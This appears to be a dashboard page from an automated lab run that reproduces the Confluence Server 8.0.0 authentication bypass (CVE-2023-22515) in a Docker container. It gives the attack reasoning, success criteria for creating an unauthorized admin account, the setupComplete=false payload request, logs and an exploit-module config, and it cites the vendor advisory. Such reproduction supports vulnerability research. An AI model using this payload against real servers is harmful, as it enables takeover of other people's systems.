RUN-2023-1045 Analysis In Progress
Execution Timeline
Environment Provisioning
10:42:05
Docker container `atlassian/confluence-server:8.0.0` started successfully on port 8090.
Network Reachability Check
10:42:35
Target responding to HTTP GET / with 200 OK. Latency 12ms.
Vulnerability Identification
10:42:38
Detected version 8.0.0 match. Initial check for /server-info.action accessible.
Exploit Execution (Stage 1)
Running...
Sending modified XWork action request to bypass authentication middleware...
Admin Account Creation
Pending
Attack Plan & Reasoning
Strategy
The attack leverages an improperly handled parameter in the XWork action configuration. By manipulating the bootstrapStatusProvider.applicationConfig.setupComplete parameter, we can trick the application into thinking setup is incomplete.
Success Criteria
1. HTTP 200 Response on payload delivery.
2. Access to /setup/setupadministrator-start.action without auth.
3. Successful creation of user 'unauthorized_admin'.
2. Access to /setup/setupadministrator-start.action without auth.
3. Successful creation of user 'unauthorized_admin'.
Payload Structure
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
Live Log Viewer
2023-10-27 10:42:05
[INFO]
Initializing experiment controller...
2023-10-27 10:42:12
[INFO]
Pulling image atlassian/confluence-server:8.0.0
2023-10-27 10:42:35
[INFO]
Container started. ID: a1b2c3d4e5f6
2023-10-27 10:42:40
[WARN]
Response delay detected (1500ms). Retrying health check.
2023-10-27 10:42:42
[INFO]
Target is healthy. Starting exploit chain.
2023-10-27 10:42:45
[INFO]
Sending Stage 1 Payload: GET /server-info.action...
Evidence Explorer
full_report.pdf
screenshot_01.png
http_dump.har
docker-compose.yml
db_snapshot.sql
Raw Data Panels
"run_config": {
"target": "192.168.1.105",
"port": 8090,
"exploit_module": "exploit/multi/http/confluence_auth_bypass",
"parameters": {
"RHOSTS": "192.168.1.105",
"RPORT": 8090
}
}
Sources & Fix Topics
Broken Access Control
Privilege Escalation
Java
Struts2
Official Advisory: Atlassian Security Advisory 2023-10-04
NVD Entry: CVE-2023-22515